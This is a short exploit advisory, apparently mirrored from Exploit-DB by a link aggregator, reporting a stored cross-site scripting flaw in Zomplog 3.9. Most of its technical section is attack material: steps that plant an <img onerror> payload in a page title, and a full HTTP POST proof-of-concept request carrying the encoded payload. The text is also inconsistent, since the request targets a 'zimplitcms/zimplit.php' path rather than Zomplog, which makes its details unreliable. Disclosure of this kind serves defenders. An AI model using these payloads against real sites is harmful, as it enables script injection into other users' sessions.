1
[webapps] Zomplog 3.9 - Cross-site scripting (XSS)
source link: https://www.exploit-db.com/exploits/51625
Go to the source link to view the article. You can view the picture content, updated content and better typesetting reading experience. If the link is broken, please click the button below to view the snapshot at that time.
Zomplog 3.9 - Cross-site scripting (XSS)
EDB-ID:
51625
EDB Verified:
Exploit Title: Zomplog 3.9 - Cross-site scripting (XSS)
Application: Zomplog
Version: v3.9
Bugs: XSS
Technology: PHP
Vendor URL: http://zomp.nl/zomplog/
Software Link: http://zomp.nl/zomplog/downloads/zomplog/zomplog3.9.zip
Date of found: 22.07.2023
Author: Mirabbas Ağalarov
Tested on: Linux
2. Technical Details & POC
========================================
steps:
1. Login to account
2. Add new page
3. Set as <img src=x onerror=alert(4)>
4. Go to menu
Poc request:
POST /zimplitcms/zimplit.php?action=copyhtml&file=index.html&newname=img_src=x_onerror=alert(5).html&title=%3Cimg%20src%3Dx%20onerror%3Dalert(5)%3E HTTP/1.1
Host: localhost
Content-Length: 11
sec-ch-ua:
Accept: */*
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5735.134 Safari/537.36
sec-ch-ua-platform: ""
Origin: http://localhost
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: http://localhost/zimplitcms/zimplit.php?action=load&file=index.html
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: ZsessionLang=en; ZsessionId=tns0pu8urk9nl78nivpm; ZeditorData=sidemenuStatus:open
Connection: close
empty=empty
Recommend
About Joyk
Aggregate valuable and interesting links.
Joyk means Joy of geeK